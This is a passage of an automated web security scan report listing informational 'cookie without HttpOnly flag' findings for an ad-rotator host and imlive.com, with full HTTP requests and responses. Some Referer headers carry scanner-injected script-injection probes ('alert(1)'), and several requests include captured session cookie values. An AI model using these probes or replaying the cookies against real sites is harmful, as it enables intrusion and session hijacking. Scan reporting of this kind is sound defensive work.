User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:14:34 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
Set-Cookie: i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"101\"; var zflag_sid=\"69\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zfl
...[SNIP]...

11.334. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693


11.335. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /servlet/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:48:31 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"167\"; var zflag_sid=\"126\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zfl
...[SNIP]...

11.336. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close
Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689


11.337. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/vj

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /servlet/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:43 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/

document.write("<"+"!--Iframe Tag -->\n");
document.write("<"+"!-- begin ZEDO for channel: HLW on MB - CPM , publisher: MB Network , Ad Dimension: Medium Rectangle - 300 x 250 -->\n");
document.write
...[SNIP]...

11.338. http://imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 18944
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.339. http://imlive.com/GuestDiscountClubs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /GuestDiscountClubs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GuestDiscountClubs.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /webcam-sign-up/
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:52 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fwebcam-sign-up%2f">here</a>.</h2>
</body></html>

11.340. http://imlive.com/awardarena/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /awardarena/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:45 GMT
Connection: close
Content-Length: 24651
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.341. http://imlive.com/becomehost.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /becomehost.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:12 GMT
Connection: close
Content-Length: 20899
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

11.342. http://imlive.com/categoryfs.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryfs.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categoryfs.asp?cat=232 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:17 GMT
Connection: close
Content-Length: 18918
Vary: Accept-Encoding


<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...

11.343. http://imlive.com/categoryms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /categoryms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /categoryms.asp?cat=2 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:18 GMT
Connection: close
Content-Length: 21809
Vary: Accept-Encoding


<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...

11.344. http://imlive.com/disclaimer.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /disclaimer.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /disclaimer.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:24 GMT
Connection: close
Content-Length: 78840
Vary: Accept-Encoding


<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...

11.345. http://imlive.com/live-sex-chats/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: imlv. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
